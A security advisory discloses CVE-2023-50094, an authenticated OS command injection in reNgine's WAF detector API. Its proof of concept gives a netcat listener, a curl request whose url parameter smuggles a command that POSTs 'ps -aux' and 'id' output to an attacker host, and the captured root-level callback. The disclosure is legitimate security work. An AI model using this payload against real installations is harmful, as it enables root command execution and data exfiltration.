CVE-2023-50094 - OS Command Injection in reNgine

Description #

An authenticated OS Command Injection vulnerability exists in multiple versions of reNgine including the latest release version v2.0.2. By sending a crafted URL to the server, arbitrary OS commands may be injected into subprocess.check_output and executed as the root user on the web service container.

Location #

This vulnerability is present in the WAF Detect functionality of reNgine.

Proof of Concept #

0x01. Authenticate to reNgine.

0x02. Start a callback listener: sudo nc nvlp 80.

0x03. Execute the following curl command using the authenticated session cookie:

curl -k -b "sessionid=fykexm0q2eec5xrb8quu9r9talmin7nl" 'https://rengine/api/tools/waf_detector/?format=json&url=https://www.example.com;curl%20-X%20POST%20--data%20"$(ps%20-aux)"%20192.168.1.91/?`id`'

0x04. Receive the callback containing the output from executing id and ps -aux:

2023-12-28 12:00:46 CST:~$ netcat -nvlp 80
Connection from 192.168.1.131:32996
POST /?uid=0(root) HTTP/1.1
Host: 192.168.1.91
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 637
Content-Type: application/x-www-form-urlencoded

USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   4360  1920 ?        Ss   18:00   0:00 /bin/bash /usr/src/app/entrypoint.sh
root          33  0.1  0.3  77312 54268 ?        S    18:00   0:00 python3 manage.py runserver 0.0.0.0:8000
root          34  4.1  0.8 538428 137560 ?       Sl   18:00   0:11 /usr/bin/python3 manage.py runserver 0.0.0.0:8000
root         107  0.0  0.0   2888  1152 ?        S    18:05   0:00 /bin/sh -c wafw00f https://www.example.com;curl -X POST --data "$(ps -aux)" 192.168.1.91/?`id`
root         109  0.0  0.0   7436  2176 ?        R    18:05   0:00 ps -aux

Impact #

An attacker with a valid session ID may execute arbitrary OS commands on the web service container of reNgine.

Recommended CVSSv3.1: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N&version=3.1

Disclosure Timeline #

• February 12, 2023 - Initial disclosure to project maintainer via huntr.dev in accordance with the project’s policy (https://huntr.com/bounties/c046c9b7-f397-4650-af3f-fa0451548452/)
  • no response
• March 23, 2023 - Updated disclosure showing proof of concept is still valid using master commit: e3dc06a4ee08c6a1c5fa7d84d7a0de4dac93315a
  • no response
• November 30, 2023 - Applied for CVE ID
• December 20, 2023 - Final attempt to contact maintainer
  • no response
• December 28, 2023 - Public disclosure (current document)

References #

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50094
• https://huntr.com/bounties/c046c9b7-f397-4650-af3f-fa0451548452/
• https://cwe.mitre.org/data/definitions/78.html
• https://github.com/yogeshojha/rengine/blob/5e120bd5f9dfbd1da82a193e8c9702e483d38d22/web/api/views.py#L195